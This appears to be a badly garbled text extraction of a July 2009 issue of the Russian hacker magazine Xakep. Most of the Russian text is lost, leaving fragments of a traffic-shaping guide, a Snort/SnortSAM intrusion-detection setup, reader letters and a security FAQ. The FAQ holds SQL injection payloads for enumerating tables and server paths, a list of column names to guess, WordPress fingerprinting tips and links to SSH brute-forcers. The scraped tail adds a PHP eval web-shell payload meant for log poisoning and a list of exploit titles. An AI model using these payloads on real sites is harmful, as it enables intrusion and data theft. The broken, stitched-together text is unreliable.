172.16.5.0

# tc qdisc add dev eth0 parent 1:1 handle 10:0 sfq

( ). , torrent- (
TOS), , :
# tc qdisc add dev eth0 parent 1:2 handle 20:0 tbf \
rate 512kbit buffer 3200 limit 3000
# tc qdisc add dev eth0 parent 1:3 handle 30:0 tbf \
rate 256kbit buffer 6400 limit 3000
,
.
, SSH- .
prio ,
22 1:1.
# tc filter add dev eth0 parent 1:0 protocol ip prio 1 \
u32 match ip dport 22 0xffff flowid 1:1
:
filter add .
dev eth0 .
parent 1:0 .
protocol ip , .
prio 1 1 ().
u32 .
match ip dport 22 0xffff .
22.
flowid 1:1 1:1 .
. , .
HTB Traffic
Control CBQ (Class-Based Queue),
. CBQ
, , (
, ).
X 07 /127/ 09
>> SYN/ACK
htb rate 20mbps
10 /:
# tc class add dev eth0 parent 1:1 classid 1:13 htb rate
10mbps
5 /:
HTB TC
HTB (Hierarchical Token Bucket). HTB ,
.
CBQ, .
HTB .
HTB , , . , Linux, eth1 , eth0 . 100 . :
, IT-
, 2 /c , 1 /c, 512
/c, 256 /c.
. : IP-
( HTB
, ). :
-,
( IT- 172.16.1.0,
172.16.2.0, 172.16.3.0, 172.16.4.0,
172.16.5.0). .
,
, ,
.
,
. HTB
:
# tc qdisc add dev eth0 root handle 1: htb default 15
default 15 , 1:15.
, (
):
# tc class add dev eth0 parent 1: classid 1:1 htb \
rate 100mbps ceil 100mbps
.
IT- 30-
() 100 ,
:
# tc class add dev eth0 parent 1:1 classid 1:11 \
htb rate 30mbps ceil 100mbps
20- :
X 07 /127/ 09
5mbps
40 / :
40mbps
, FIFO. .
,
sfq:
#
#
#
#
#
tc
tc
tc
tc
tc
qdisc
qdisc
qdisc
qdisc
qdisc
add
add
add
add
add
dev
dev
dev
dev
dev
eth0
eth0
eth0
eth0
eth0
parent
parent
parent
parent
parent
1:11
1:12
1:13
1:14
1:15
handle
handle
handle
handle
handle
10:0
20:0
30:0
40:0
50:0
sfq perturb
sfq perturb
sfq perturb
sfq perturb
sfq perturb
10
10
10
10
10
, :
# tc filter add dev
u32 match ip
# tc filter add dev
u32 match ip
# tc filter add dev
u32 match ip
# tc filter add dev
u32 match ip
eth0 protocol ip parent 1:0 prio

src 172.16.1.0/24 flowid 1:11
src 172.16.2.0/24 flowid 1:12
src 172.16.3.0/24 flowid 1:13
src 172.16.4.0/24 flowid 1:14
1\
1\
1\
1\
, .
, ,
(, ,
,
10 , ).
, HTB, , .
, 256 / , . -
-:
htb rate 256kbps
:
# tc filter add dev eth0 protocol ip parent 1:15 prio 1 \
u32 match ip src 172.16.1.32 flowid 1:150
, FIFO. ,
.
,
IP-
.z
125
>> SYN/ACK

/ J1M@SYNACK.RU /
Snort
SnortSAM - BASE
>> SYN/ACK
-
. ,
.
, .
OpenSource NIDS
(Network Intrusion Detection System)
(Intrusion Prevention
System) Snort (www.snort.org). , (
SnortSAM). Snort : ,
, .
,

, ,
..
( ASCII tcpdump-), (MySQL,
PostgreSQL). Snort
(,
).
.
SNORT ,
Snort
SnortSAM FreeBSD 7.x.
- BASE.
:
# portsnap fetch
# portsnap update
Snort,
126
MySQL SnortSAM:
# cd /usr/ports/security/snort
# make -DWITH_MYSQL -DWITH_SNORTSAM
# make install
. , Snort /
usr/local/etc /usr/local/etc/
rc.d. snort.conf /usr/local/etc/snort
. ,
snort.conf:
# ee /usr/local/etc/snort/snort.conf
; ( , )
var HOME_NET 192.168.1.0/24
;
var EXTERNAL_NET !$HOME_NET
;
Snort IP- .
,
var DNS_SERVERS 192.168.1.1
var SMTP_SERVERS 192.168.1.2
; ( HTTP),
Snort
portvar HTTP_PORTS [80,8000:8080]

portvar SHELLCODE_PORTS !80
;
Syslog
output alert_syslog: LOG_AUTH LOG_
ALERT
(rules), Snort . /usr/local/etc/snort/rules,

var RULE_PATH ./rules,

local.rules. var RULE_PATH
rules. ,
. Step #6: Customize your rule
set, snort.conf.
include $RULE_PATH/local.rules
include $RULE_PATH/bad-traffic.rules
# include $RULE_PATH/experimental.
rules
.
local.rules
, . , ,
,
. rules .
Snort 2.4.0 (2005 ), .
snort.org, OinkCode, X 07 /127/ 09
>> SYN/ACK
CHECKPOINT
FIREWALL WITH
SNORTSAM
AGENT
COMPANY
NETWORK
SNORT SENSOR
CHECKPOINT
FIREWALL WITH
SNORTSAM
AGENT
. Community rules. . ,
rules, . , ,
. Perl- Oinkmaster (oinkmaster.
sf.net), . :
# cd /usr/ports/security/oinkmaster
# make install clean
Oinkmaster oinkmaster.conf
IDS/IPS ,
, .
, ,

,
.
, IDS/IPS , (
IDS,
, IPS).
IDS ( , , IPS).
IPS IDS, , , TCP-, .
.
. , (
normalize) , -. , , . ,
X 07 /127/ 09
/etc, /usr/local/etc.
FreeBSD , :
# cp -v /usr/local/etc/oinkmaster.conf.sample
/usr/local/etc/oinkmaster.conf
# ee /usr/local/etc/oinkmaster.conf
; <oinkcode>
, snort.org
url
=
http://www.snort.org/pub-bin/oinkmaster.cgi/
<oinkcode>/snortrules-snapshot-CURRENT.tar.gz
,
. , ,
, .
.
IDS , ,
. ! IPS, ,
DoS-. , .
IPS , .
.
IDS ,
, . ,
, , , IDS.
, ,
.

127
>> SYN/ACK
SNORT
HTTP://WWW
links
:
FreeBSD www.
freebsd.org/ru.
Snort snort.org.
Oinkmaster
oinkmaster.sf.net.
BASE base.
secureideas.net,
sf.net/projects/
secureideas.
Snortsam www.
snortsam.net.
DVD
dvd

, ,

Snort FreeBSD
7,

MySQL
- BASE.
BASE,
MYSQL
; Community rules oinkcode

url = http://www.snort.org/pub-bin/downloads.
cgi/Download/comm_rules/Community-RulesCURRENT.tar.gz
; ,
path = /bin:/usr/bin:/usr/local/bin
update_files = \.rules$|\.config$|\.conf$|\.
txt$|\.map$
; ,
skipfile local.rules
skipfile deleted.rules
skipfile snort.conf
skipfile sid-block.map
Oinkmaster , , ,
( ) . Snort SID (Snort ID), Oinkmaster.
,
SID 12345, oinkmaster.conf : disablesid
12345. : enablesid.
modifysid,
SID . , SID 1111
exploit.rules alert drop:
modifysid exploit.rules, 1111 "âlert" | "drop"
, Snort.
'v'.
:
# snort -vd
, , .
'i':
# snort vd -i le0
NIDS:
# snort -c /usr/local/etc/snort/snort.conf
Initializing rule chains...
2163 Snort rules read
2163 detection rules
-*> Snort! <*Version 2.8.2.2 (Build 18) FreeBSD
tail -f /var/log/messages , :
, ,
:
snort[23312]: Initializing daemon mode

kernel: le0: promiscuous mode enabled
snort[23313]: Snort initialization completed
successfully (pid=23313)
# /usr/local/bin/oinkmaster -o /usr/local/etc/
snort/rules/
, . ,
:
cron:
# crontab -e
30 2 * * * /usr/local/bin/oinkmaster -o /usr/local/etc/
snort/rules/ -b /usr/local/etc/snort/backup 2>&1
2:30 Oinkmaster . (90 ),

, Snort , , :
# oinkmaster -u file:///tmp/rules.tar.gz -o /usr/
128
local/etc/snort/rules/
snort[23313]: Not Using PCAP_FRAMES
PCAP_FRAMES ( 0 32768, max 32768), .

, :
# setenv PCAP_FRAMES max
/etc/csh.cshrc. , /
bin/bash setenv export /etc/profile:
# export PCAP_FRAMES="max"
X 07 /127/ 09
>> SYN/ACK
BASE

Snort /etc/rc.conf :
# echo 'snort_enable="YES"' >> /etc/rc.conf
# /usr/local/etc/rc.d/snort start
SNORT MYSQL , Snort

, .
, .
Snort -DWITH_MYSQL MySQL. :
# mysql
mysql Ver 14.12 Distrib 5.0.75, for portbld-freebsd7.1
(i386) using 5.2
, 5.0, MySQL .
.
MySQL :
#
#
#
#
cd /usr/ports/databases/mysql50-server
make install clean
/usr/local/bin/mysql_install_db
cp /usr/local/share/mysql/my-medium.cnf /etc/my.cnf
:
# echo 'mysql_enable="YES"' >> /etc/rc.conf
# /usr/local/etc/rc.d/mysql-server start
:
# sockstat -l
mysql mysqld 42648 10 tcp4 *:3306 *:*
mysql mysqld 42648 12 stream /tmp/mysql.sock
MySQL:
MYSQL
:
# mysql -u snort -psnortpassword snort < /usr/local/share/
examples/snort/create_mysql
Snort MySQL, snort.conf :

# ee /usr/local/etc/snort/snort.conf
outputdatabase:log,mysql,user=snortpassword=snortpassword
dbname=snort host=localhost
Snort:
# /usr/local/etc/rc.d/snort restart
, Snort
MySQL, BASE.
BASE Snort ,
SnortALog, Syslog, , .
BASE (Basic Analysis and Security Engine, base.secureideas.net),
ACID (Analysis
Console for Intrusion Databases). ACID . BASE
PHP-, -.
- PHP : adoDB, GD, PEAR Image_Graph.
:
# cd /usr/ports/security/base
/usr/local/www/
base. :
# /usr/local/bin/mysqladmin -u root password newpassword

# chown -R www:www /usr/local/www/base
snort
:
# mysql -u root -p
mysql> CREATE DATABASE snort;
mysql> GRANT ALL PRIVILEGES ON snort.* TO 'snort'@'localhost'
IDENTIFIED BY 'snortpassword';
mysql> FLUSH PRIVILEGES;
mysql> quit;
X 07 /127/ 09
, http://ip-snort/base
. /usr/local/www/base, PHP PHP. ,
, adoDB ( /
usr/local/share/adodb).
snort (Database type = MySQL, Database name = snort, Database Host
= localhost, Database username = snort, Database Password = snortpassword).
129
>> .PRO
SYN/ACK
BASE
, , , , Use Authentication System, .

, Create BASE AG, . http://ip-snort/base , , , Snort
, , , ..
, BASE ,
.
SNORTSAM , ,
,
.
SnortSAM (www.snortsam.net),
IP-, IP Filter (ipf), ipfw2, Packet
Filter (pf), Linux IPtables/EBtables, MS ISA Server firewall/proxy,
Cisco .. SnortSAM
( !). SnortSAM
: Snort ( , '-DWITH_
SNORTSAM') . :
# cd /usr/ports/security/snortsam
BASE
;
dontblock 192.168.1.0/24
; DNS-,
include rootservers.cfg
;
daemon
;
logfile snortsam.log
loglevel 3
; IP Filter
ipf le0
snort.conf :
output alert_fwsam: 127.0.0.1/snortsam_key
127.0.0.1 , SnortSAM,
. Snort, , 'fwsam: {},
{};'. , , :
fwsam: src, 1 hour;. Oinkmaster.
modifysid 12345 "\)$" | "fwsam: src, 10 minutes;)"
SnortSAM :
Snort SnortSAM:
OPTIONS= PFW "Enable IPFW table checking if it set deny
rules" on
, . :
# cp /usr/local/etc/snortsam/snortsam.conf.sample /usr/
local/etc/snortsam/snortsam.conf
snortsam.conf . . :
# ee /usr/local/etc/snortsam/snortsam.conf
; snort.conf.
accept
defaultkey snortsam_key
; , SnortSAM (
898).
port 898
130
# /usr/local/etc/rc.d/snort restart
# echo 'snortsam_enable="YES"' >> /etc/rc.conf
# /usr/local/etc/rc.d/snortsam start
local.rules , 192.168.1.1 Snort:

alert tcp any any -> 192.168.1.1 11110 (msg:"TEST log 11110/
tcp"; sid:1111110;)
alert tcp any any -> 192.168.1.1 11111 (msg:"TEST block
11111/tcp"; sid:1111111; fwsam:src[in],5min;)
11110 , 11111
5 . , , . , Snort SnortSAM. ,
, :). z
X 07 /127/ 09
>> SYN/ACK

ASUS GX2008EX
>> SYN/ACK
:
: POE
: 8X 10/100 FAST ETHERNET (RJ-45), 1X GIGABITE ETHERNET (RJ-45), 1X
GIGABIT ETHERNET (SFP)
: VLAN, POE, RADIUS-,

: WEB-GUI, CLI/TELNET, SNMP V.1/V.2
, : 330 44 220
ASUS

.

. ,
ASUS
.
,
c SOHO-.

ASUS GX2008EX.
8- Fast Ethernet,
X 07 /127/ 09
Gigabit Ethernet
SFP .

PoE (Power
over Ethernet).
8- Fast Ethernet.

IP-, Wi-Fi
,
,
. PoE
.
(
Telnet ),
Web. ,
,
.

.

(Link Aggregation),
(Mirroring),
VLAN,
CoS.

RADIUS-
flood
. ,
10000 .
MAC- .
.
, , ,
.
, ,
ASUS GX2008EX

.
,
Ethernet. , ASUS

. z
131
>> units

/ LOZOVSKY@GAMELAND.RU /
PSYCHO:

6

, .
,
, .
,
,
, , , () Psycho.

.
, , ,
?

,
,

( )
.

,

.
,
(, ),

, ,
,
,
!
,

.
? !

? -, !

132
,
? !

:
,

. , , .
,
,
( ,

,
, ,
.),

,
.
, ,
-

,
,
,
.
, .

.
.
,

, -
- .
,
,

, ,
,

,
.
( , )
,

. , , -
: , ,

,
(-,
)

,
.
, ,
,
!
,
,
(
- , -
).
,
- (
,
)
..

;
,
,
,
,
. ,
.
,
(
,
,

?), , , ? :

,
. ,
,
.

.

, ,
. ,

,
:).
z
X 07 /127/ 09
>> units
, ,
.
,

.
. ,
.
,
,
,
-
. ,

,
(, ).

. ;
,

.
.
, , ? ,

-,
, .
, .
,

, , ,
( ,

).
,
X 07 /127/ 09

,
.

,

,

. -
.
- .
, ,
:).
. :
, , .
:
,
-
.
- :

.
,
,
. ,

, ,
. ,
,

? , !
. ,

.
,

. ,
.

, , , - .

. ,

. :).
,
( 2% ,
). ,
, -
:
,
, , . ,

,
.
-, ,
!

, ,
,
, ,
,
, .
,
.
-

.
!
,

. .
,
,
,
-, ,
(
).
,
,
,
.
, , ,
. ,
.
, , ,
.

,

,
133
>> units
:
:)

,

. , ( ) .
. .
, , .
( ,

, )
,
. , ,
, ,
. ,
, ,
.
, ,

(

,
).
,

(-, )
(
) -
, , .
,

z

, , , ,
,
(
, -
134
;
).
, ,

-
( ), , ,
.

! ,

,
,

5 40 .
: XXI !

, .
, ,

,

,
,
, , ,
,
, .
, , : 7-10% (
25%, )
.

,

.
, , ,
,
, :
( ,
?),
, .

,
. -,
. ,
--- ,

,
-.

( ,
) ,
. ,
,
.

, ,
, ,
. , .

,
.
,
,
( ),
.
:
, , .
,
,
(,

).

,
(
) .
,
( ,

),

.
SCHIZO:

, , .
,
(

).
,
(
) ( , )
;
. ,
,
, :).
X 07 /127/ 09
>> units
DIGITAL SURROUND REALITY

,
. ,
, ,
( - ,
), .
, ,
. ,
(, , )
.
,
IQ-?
. . ,
,
- ? ( ,
, ), , .
.
,
( ,
). , :).
, .
? -, , -,
.
, , , ,

.
X 07 /127/ 09

,
.
-,
,
. -,

.
, ,

. ,
,

?
,
:
?
. ,
,

, .

,
,
, ,
.

,
,
.
,

.
. ,

,
,
,

.
:). z
135
>> units
E-MAIL UNITED:

: Zinatulin Igor
<zinatulin@gameland.ru>
: : 5
GAMELAND
, - ,
. -.
(), ,
,
,

. ,
( ),

. !
-!
,
. - .
:
<prdruzia3@gmail.com>
: Lozovsky Alexander
<lozovsky@gameland.ru>
: -
Home
[]
HOME
, . , ,
, .
[]
-
, ,
. ,
, , , ,

, , 1895 :
, ,
,
.
,
,
;
,
.

:). ,
, , ,

. , ,
, -
?
: * Malware * <never.anger.the.hacker@
gmail.com>
: Lozovsky Alexander <lozovsky@
gameland.ru>
: Where is K.K???
, ! , , ? ,
? ?
! , !
. ,
-
.
, , ,
. , .
,
.

:(. ,
? .

!
http://www.youtube.com/watch?
[censored]
136
X 07 /127/ 09
>> units
: Andrey Matveev <andrushock@real.

xakep.ru>
: Lozovsky Alexander <lozovsky@
gameland.ru>

MAGAZINE@REAL.XAKEP.RU
!

.
e-mail

.
,
, ,
,
! ya ne vizhu russkih bukv,

. ,

( !), ,
. (nikitos )
, ,
,
.
, !
.
.
Nokia,

. ,
,
.
.

2-, 3-
.
, 3- Windows
Vista. , OpenBSD
. , ,
.

( )
FROM: alex-rus@live.ru <alex-rus@live.ru>
SUBJECT: visual basic 2008
TO: Kislytsyn Nikita <nikitoz@glc.ru>
. ,
. , ,
,
visual basic 2008. ,
.
X 07 /127/ 09
, !
z-
.
, , ,
, 14- , . -, ,
,
14. , z
, .
137
59%
HEALTH
59%
HEALTH
13%
ARMOR
13%
59%
HEALTH
ARMOR
23 , ,
Gameland.
7,5 . , 4 . . 1 . .
,
,
.

:
PC,

XBOX 360.
138
-, ,
.
,
,
Acer
Aspire 7720,
, Intel Core
i7, , Intel
Centrino 2

Intel Core 2 Quad (HP HDX).
-

: F.E.A.R.
2: Project Origin, Call Of Duty:
World at War, Race Driver: GRID,
Gears of Wars 2, Mortal Kombat
vs. DC Universe. 23
(
)

BMW-Sauber F1,
Intel. -
.

5 . .
.

, ,

,
.

X 07 /127/ 09

,
,

.

,
,
- Intel
.

X 07 /127/ 09
, -,

. ,

.
Acer
,
.

,
,
,
, ,

Acer
. , -
. ,
, ,
Acer
,
, Acer .

Intel,
Acer, HP, Samsung,
, Microsoft, Logitech.

Gameland.
139
>> units
/ ICQ 884888, HTTP://WAP-CHAT.RU /
FAQ UNITED:
Q: , . ,
?
A: ,
ATM .
SEO-
Glavmed.Com, ,
EPassporte (Visa) Payoneer (MasterCard).

WebMoney http://
cards.webmoney.ru.
(
,

)
:
1. WebMoney Banquecard (
WMZ- ,
- ( Star Plus);
140
2. WebMoney Payoneer (
WMZ- ,
- ( Mastercard);
3. WebMoney Virtual (
(, , )
).
Banquecard WMZ, Payoneer
.
<?php
$dir = '/home/your-site.com/www/';
$antibot_cookie = md5('random
phrase'.getenv('HTTP_USER_AGENT'));
$ban_file = 'banned.txt';
Q: ,
$f = fopen($dir . $_SERVER["REMOTE_
ADDR"], "a");
fwrite($f, "string\n");
fclose($f);
$counter = @file($dir . $_
SERVER["REMOTE_ADDR"]);
-
?
A: .

- .
. Agnitum Outpost Firewall, ,
, iptables :) ,
( ,
):
if(strstr(@file_get_
contents($dir.$ban_file), $_
SERVER['REMOTE_ADDR']))
exit;
if (!isset($_COOKIE['ddos']))
setcookie('ddos', $antibot_
cookie, time() + 3600*24*7*356);
elseif ($_COOKIE['ddos'] !==
$antibot_cookie || count($counter)
> 10)
X 07 /127/ 09
>> units
{
system("iptables -A INPUT -s ".$_
SERVER["REMOTE_ADDR"]." -j DROP");
$f = fopen($dir.$ban_file, "a");
fwrite($f, $_SERVER['REMOTE_
ADDR'].'|');
fclose($f);
!
. ,
.
Q: SQL- PostgreSQL, :
header('Location: http://'.
gethostbyaddr($_SERVER["REMOTE_
ADDR"]));
exit;
}
?>
Q: Google Analytics, -
LIMIT 1,1.
?
A: LIMIT
PostgreSQL, : LIMIT
OFFSET.
LIMIT ,
OFFSET , .
:
,
.

?
site.com/index.php?id=-1 UNION
SELECT TABLE_NAME,NULL FROM
INFORMATION_SCHEMA.TABLES LIMIT 1
OFFSET 0 --
A: php-
Piwik (http://piwik.
org, PhpMyVisits).
,
(, ,
),
,
Google:
;
API-;
XML, JSON, PHP, CSV;

;

;
,
;
, , , , , ,
;
, ;
live ;
, , goals;
(, ..);

.
X 07 /127/ 09
name
names
usrlogin
usr_login
userlogin
user_login
usr_name
username
user_name
nickname
nick_name
user_nick
nickuser
nick_user
nickusers
nick_users
client
clients
member
members
Q: iframe
. ,
SQL-
INFORMATION_SCHEMA.TABLES.
Q: SQL- ,
. ?
A: aka PSIH
,
:
account
accounts
adm
admin
admins
administrator
administrators
adminlogin
login
logins
usr
user
users
nick
nicks
.
A:
http://seotrance.
com/tools/redirect-iframe-encoder (,
,
javascript html-).
:

, ,
.
. ,
,
;
eval ,
, .
-
- .
Q: -
MySQL, SQL-. .
141
>> units
A: , MySQL
, Server
System Variables (
http://dev.
mysql.com/doc/refman/5.0/en/server-systemvariables.html).
,
:
1. basedir ,
MySQL;
2. datadir , MySQL
;
3. tmpdir ;
4. version_compile_os , MySQL.

-
:
http://site.com/index.php?id=-1
UNION SELECT @@basedir,2,3/*

, , .
.
Q: load_file() SQL-
, char. ,
for($i=0;$i<count($arr2);$i++)
{
$returnstr .= chr($arr2[$i]);
}
return $returnstr;
}
?>
Q: ,
WordPress?
A: !
( html- ):
1. site.com/?feed=rss2
2. site.com/wp-includes/js/tinymce/wp-mcehelp.php
3. site.com ( <meta
name=generator content=WordPress [] />)
4. site.com/readme.html
5. site.com/wp-admin/upgrade.php
http://site.com/wp-login.php,
2.3.x, 2.5.x, 2.6.x, 2.7.x (

Release Archive http://
wordpress.org/download/release-archive).
-
, wp-app.php,
2.2.x
.
two hop tunneling (

).
:
ssh ,

(
).

myhome.example.org, gateway.
example.com,
SSH-
server.example.com.
- .
myhome.example.org
:
ssh -f -N -L 51526:server.example.
com:22 -2 gateway.example.com
! , SSH-
51526 myhome.example.
org , ..
server.example.com. ,
server.
example.com:22,
51526,
SSH. ,

, 4915265535
A: -
Q: , , -
Q: -
php-,
char:
SSH.
VMware?
A: :
A: VMware -
1. SSH Brute Forcer (http://www.securiteam.

com/tools/5QP0L2K60E.html)
shell- .
2. SSHatter (http://freshmeat.net/projects/
sshatter) Perl
, -, SSH.
3. SSH BruteForcer (http://www.darkc0de.
com/bruteforce).
Python, ,
,
, ,
SSH-
IP-
VMware vCenter
Converter (http://www.vmware.com/products/
converter).

.
<?php
function tochar($str)
{
$returnstr='';
for($i=0;$i<256;$i++)
{
$arr[chr($i)]=$i;
}
for($i=0;$i<strlen($str);$i++)
{
$i!=(strlen($str)-1)
? $returnstr .=
$arr[substr($str,$i,1)].','
: $returnstr .=
$arr[substr($str,$i,1)];
}
return $returnstr;
}
?>
, (
12,32,53,64,25):
<?php
function fromchar($str)
{
$arr2=explode(',',$str);
$returnstr='';
142
Q: 2 ssh
(2-hop ssh tunnel)?
A: SSH -
,
, VNC (
). ,
: ,

( -
).
,
,
,
Q:
?
A: . -
, , :
1. Symantec Backup Exec (http://
www.symantec.com/business/backup-exec-forwindows-servers).
2.
3. Backup Exec IDR

Intellegent Disaster Recovery.
4. CD.
5. CD,
<F2> Automated System Recovery.
6.
. -.
- :
(, ,
..).
! z
X 07 /127/ 09
>Net
BarracudaDrive Web Server 4.1
freeFTPd 1.0.11
freeSSHd 1.2.4
Gbridge 2.0
>Multimedia
1by1 1.68
BumpTop 1.0
Double Vision 1.0
FLV Extract 1.6.0
Foxit Reader 3.0
Image Tuner 1.0
IrfanView 4.25
MP3QualityModifier1.0
Win7codecs 1.1.9
>>UNIX
>Desktop
Alltray 0.70
Deco 1.6.0.1
Dynwallpaper 0.3.1
E-Cell 3.1
Enlightenment 1.0.0
Filecutter 0.1
GRAMPS 3.1.2
HandBrake 0.9.3
Joyevmouse 0.3
Katmus 0.16
Krusader 2.0.0
Mac4Lin 1.0
Minirok 2.0
PCManFM 0.5.1
Synchrorep 1.3.4
>System
DirSync Pro 1.02
Docfetcher 1.0
Ext2 Installable File System 1.11a
FreeCommander 2009.02
MokaFive Player
Recuva 1.28
Single Click Restore Point (SCRP)
Snowbird 0.7
>Security
TSGrinder 2.0.3
AutomationBox Tools 1.0
Burp Suite 1.2.01
ClamWin Portable 0.95.2
Dependency Walker 2.2
Eraser 5.86a
Grendel Scan 1.0
Memoryze
MyEnTunnel 3.4.1
Nessus 4.0.1
Nmap 4.90RC1
Paros 3.2.13
VMMap v2.0
10 :
Brutus AET2
Cain & Abel 4.9.31
CIFSPwScanner 1.0.5
FSCrack 1.0.1
John the Ripper 1.7.0.1
l0phtCrack 6
Md5 Crack Monster v1.1
piggy 1.0.1
RainbowCrack 1.3
THC PPTP bruter
THC-Hydra 5.4
>Games
Numptyphysics 0.2
>Misc
ChickenPing 1.12
Client for Google Translate 3.0.64
Evernote 3.1.0
HashTab 3.0.0
Jumplist-Launcher 4
SpaceSniffer 1.1.0.0
TeraCopy 2.01
TreeSize Free 2.32
WindowTabsSetup
:
3RVX 2.5
allsnap 1.41
Desktop Media 1.7
Dexpot 1.4.0
Everything 1.2.1
Fences 0.96
FileBox eXtender 2.00.4
Folder Menu 2.7
Folder Size 2.4
FreeSnap 1.5.3
Launchy 2.1.2
Link Shell Extension
Q-Dir 3.84
QTTabBar 1.2.2.1
RBTray 3.3
Sizer 3.3
StandaloneStack 2
Taskbar Shuffle 2.5
TaskSwitchXP
Unlocker 1.8.7
Visual Subst 1.0.6
Visual Task Tips 3.4
WinSplit Revolution 9.02
GDocBackup 0.3.2
GoToMyWebServer
Heatmap Studio 0.7
Mozilal Firefox 3.5
NetWorx 4.9.7
PingInfoView 1.25
qutIM 0.2b
Songbird 1.2.0
TorrentFetcher 1.02
TwInbox
>>WINDOWS
>Development
Developer's Tips & Tricks (DTT)
1.2.1.1
Eclipse Classic 3.5.0
NetBeans IDE 6.7
PDT 2.1
Python 3.1
Small Basic 0.5.1
SQLite Expert Personal 2.0.40
>Net
Ajax Chat 0.8.3
Anyremote 4.17
Dimdim 5.0
FrostWire 4.18
Lobo 0.98.4
Mozilla Firefox 3.5
MultiGet 1.2.0
Nagios 3.1.2
NagVis 1.4
Nfdump 1.5.8
nullfxp 1.7.0
OpenNetAdmin 09.05.02
Opera 10 Beta 1
Opera Unite
Pidgin 2.5.7
RetroShare 0.4
RSSowl 2.0
Saros DPP 9.6.23
Ted 0.96
Zenoss 2.4.2
>Games
Icebreaker 1.2.1
Pingus 0.7.2
Snowball
>Devel
Android 1.5 NDK
Eclipse 3.5
Eclipse PDT 2.1
Editra 0.4.95
JavaFX 1.2
JRuby 1.3.1
jUML 4.0.0
Jython 2.5
libdmtx 0.7.0
NetBeans IDE 6.7
Perforce
PHP 5.2.10
PHP 5.3.0
PyQt 4.5
Python 3.1
QtCreator 1.2
Redcar 0.2
Terracotta ES 3.0.1
WaveMaker Ajax Studio 5.1.1
wxHexEditor 0.07 Alpha
Yii 1.0.6
Eclipse:
Bytecode Outline 2.2.10
Checkstyle 5.0.0 beta
CodePro AnalytiX 6.2.0
CodePro Profiler 2.2.0
FindBugs 1.3.9
Pydev 1.4.6
SQL Explorer 3.5.0.RC8
Ucdetector 1.1.0
UMLet 9.1
Visual Swing 0.9.12
U-comptus 0.1
UltraStar Deluxe 1.0.1a
Wmstickynotes 0.1
Xfburn 4.6.1
>X-Distr
Fedora 11
>System
Dosbox 0.73
GroundWork Monitor 5.3
Hot Copy 3.0.1 Beta
iometer 2008-06-22 rc2
Iptables 1.4.4
KernelCheck 1.2.5
Linux Kernel 2.6.30
Newtraffic 0.1.3.1
NTFS-3G 2009.4.4
Perfect Match 0.4.0
Sleuthkit 3.0.1
whohas 0.23
Wine 1.1.24
>Server
AfterLogic XMail Server 3.3.7
AWStats 6.9
BIND 9.7.0a1
DHCP 4.1.1b1
Dual DHCP DNS Server 6.42
MySecureShell 1.15
MySQL 5.4.1
Open DHCP Server 1.21
Postfix 2.6.0
PostgreSQL 8.4 RC2
Samba 3.3.5
Sendmail 8.14.3
Snort 2.8.4.1
Squid 3.0 STABLE16
Tornado 0.3.0
Varnish 2.0.4
Verlihub 0.9.8e
>Security
Afick 2.13
Airpwn 1.4
Angry IP scanner 3.0
Bleachbit 0.5.2
Clamav 0.95.2
ClamTk 4.15
Conceal 0.0.5
Firewall Builder 3.0.5
HT editor 2.0.17
Loop-aes 3.2g
PDFcrack 0.11
Privoxy 3.0.13 beta
Sqlninja 0.2.3
Tcpreplay 3.4.3
Tor 0.2.0.35
TorK 0.31
w3af 1.0
WifiScanner 1.0
Wipe 2.3.0
Wireshark 1.2.0
07(127) 2009
http://
WWW2
2
IP-

CHANGE IP&COUNTRY
RAPIDSTEPS
HTTP://ANONYMIZER.NNTIME. RAPIDSTEPS.COM
.
COM
RapidSteps , , -
- ,

IP . , .
Change IP&Country. , , , IP- , ,
. , .
ISSUU
ISSUU.COM

ONLINE
PDF-. , Flash,
, Issuu . PDF- ,
issuu.com. ,
http://issuu.com/dyms/docs/xa_99_01,
][.
144
,
. ,
.
WI-FI
WIFI4FREE.RU
WI-FI

, Wi-Fi .
wi-fi , . , ,
SMS-, .
X 07 /127/ 09

Хакер 2009 07 PDF

Загружено:

Сведения о документе

Оригинальное название

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Хакер 2009 07 PDF

Оригинальное название:

Загружено:

Авторское право:

Доступные форматы

.

WEB-HACK 2.0 / SQL- INCLUDE-

GLOBAL POSITIONING TROJAN

local remote file include

The 2009 SourceForge.net Community

image Back Butter

/ .: (495) 935-7034, : (495) 780-8824

MIFRILL / MIFRILL@R EAL.XAKEP.RU /

Facebook the movie

The Pirate Bay, , .

Opera Unite Opera Software,

, (, , NAS network attached storage)

AFP NFS ; USB.

Random Write 4KB

phpMyAdmin is also very deeply documented

phpMyAdmin is a free software tool written in

Since version 3.0.0, phpMyAdmin joined the

phpMyAdmin is also very deeply documented

INSTRUCT THE PROCESSING

COPY THE RESULT

CPU GPU. (1) . (2) GPU. (3) GPU

Distributed Password Recovery (www.

John the Ripper

Cain and Abel

ICQ, Socks5, PCNFS, Cisco, SSH, ICQ

Md5 Crack Monster v1.1

THC PPTP bruter

-t server -u users [options].

Microsoft Certified Desktop Technician

LOG EXPLOIT: XMB 1.9.11 RANDOM

MOODLE 1.X RANDOM PASSWORD

PHP GENERATE_SEED() WEAK RANDOM NUMBER SEED

STEFAN ESSER: MT_SRAND AND NOT SO RANDOM

JOOMLA WEAK RANDOM PASSWORD RESET TOKEN

LOG EXPLOIT: JOOMLA WEAK RANDOM PASSWORD

LOG EXPLOIT: XMB 1.9.11 RANDOM PASSWORD RESET VULNERABILITY

# gcc -pthread zbrute.c -o zbrute

CLIENT-HEADER-FILTER: acunetix-control Removes Acunetix

echo "[+] no luck injecting to $3/config/config.inc.

ADOBE ACROBAT 9.1.1 STACK OVERFLOW

, init alert, 4098

WINAMP BUFFER OWERFLOW

PHP <= 5.2.9 LOCAL SAFEMOD BYPASS

echo "<textarea rows=20 cols=60>";

Module. netmod ule

Common Language Infrastructure (CLI), Partition II: Metadata

LOG EXPLOIT: XMB 1.9.11 RANDOM PASSWORD RESET VULNERABILITY

brfalse brtrue, , else if,

/ ICQ 884888, HTTP://WAP-CHAT.RU /

"User-Agent: <?php eval(\$_GET[cmd]); ?>"

BLIND SQL INJECTION

select 1 regexp if(1=1,'(',2)

#1139 Got error 'invalid repetition

count(s)' from regexp

Got error 'empty (sub)

: FAST WEB SERVER

Visual C++ 2008

Fast Web Server

944d-4c28-a720-249730705714 ro quiet splash

#define EXT2_IND_BLOCK EXT2_DIR_

mi modify inode inode.

debugfs: stat <_inode>